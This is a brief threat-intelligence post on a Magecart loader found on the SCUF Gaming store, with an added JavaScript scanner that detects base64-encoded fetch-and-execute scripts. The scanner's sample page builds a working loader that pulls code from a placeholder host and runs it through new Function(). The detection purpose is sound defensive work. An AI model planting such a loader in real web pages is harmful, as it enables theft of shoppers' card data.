SCUF Gaming Magecart Loader

Just a quick post on a digital skimmer loader that is somewhat unique. The threat actor used a script tag with a base64-encoded payload.

When run, that will decode to:

The decoded script does a GET to that endpoint and executes the returned code with new Function(data).call(this).
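The fetch-and-execute behaviour described above can be hunted for in page source. The following is an added example, not code from the original post or from the skimmer: it decodes base64 script payloads and flags any that both fetch remote content and run it as code. The data: URI and atob() embedding forms, the indicator patterns, the function names and the collector.example endpoint are assumptions, since the original payload is not reproduced on this page.

```javascript
const INDICATORS = [
  { name: "dynamic-code", re: /new\s+Function\s*\(|\beval\s*\(/ },
  { name: "network-fetch", re: /\bfetch\s*\(|XMLHttpRequest|\$\.(get|ajax)\s*\(/ },
];

// Decode base64 to text; return null when the input is not plausible base64.
function decodeB64(s) {
  const clean = s.replace(/\s+/g, "");
  if (clean.length < 16 || !/^[A-Za-z0-9+/]+={0,2}$/.test(clean)) return null;
  return Buffer.from(clean, "base64").toString("utf8");
}

// Collect base64 blobs from data: URI script sources and atob("...") literals.
function extractEncodedScripts(html) {
  const blobs = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  for (const [, attrs, body] of html.matchAll(tagRe)) {
    const src = /\bsrc\s*=\s*["']data:[^"']*?;base64,([^"']+)["']/i.exec(attrs);
    if (src) blobs.push({ where: "data-uri-src", b64: src[1] });
    for (const m of body.matchAll(/atob\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)/g)) {
      blobs.push({ where: "inline-atob", b64: m[1] });
    }
  }
  return blobs;
}

// Report blobs whose decoded text both fetches remote content and runs it as code.
function scanHtml(html) {
  const findings = [];
  for (const { where, b64 } of extractEncodedScripts(html)) {
    const decoded = decodeB64(b64);
    if (decoded === null) continue;
    const hits = INDICATORS.filter((p) => p.re.test(decoded)).map((p) => p.name);
    if (hits.length === INDICATORS.length) findings.push({ where, hits, decoded });
  }
  return findings;
}

// Constructed sample page: not the SCUF payload, and the endpoint is a placeholder.
const b64 = (s) => Buffer.from(s).toString("base64");
const loader = 'fetch("https://collector.example/l").then(r=>r.text())' +
  ".then(data=>new Function(data).call(this))";
const SAMPLE_HTML = `
<script src="/static/app.js"></script>
<script src="data:text/javascript;base64,${b64('console.log("analytics ready")')}"></script>
<script src="data:text/javascript;base64,${b64(loader)}"></script>
<script>eval(atob("${b64(loader)}"))</script>`;

console.log(scanHtml(SAMPLE_HTML).map((f) => `${f.where}: ${f.hits.join("+")}`));
```

Regex matching over HTML is a triage heuristic, so renamed or further-obfuscated calls will slip past it. A Content-Security-Policy whose script-src omits data: and 'unsafe-eval' blocks both a data: URI script source and new Function() in the browser.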

URLScan of the loader: https://urlscan.io/result/e8587511-1e1a-400a-a6e1-3b964eba0143/#transactions

BleepingComputer’s article on this skimmer: https://www.bleepingcomputer.com/news/security/scuf-gaming-store-hacked-to-steal-credit-card-info-of-32-000-customers/

A modified version of this was originally posted on Twitter: https://twitter.com/AffableKraut/status/1451622631715835904
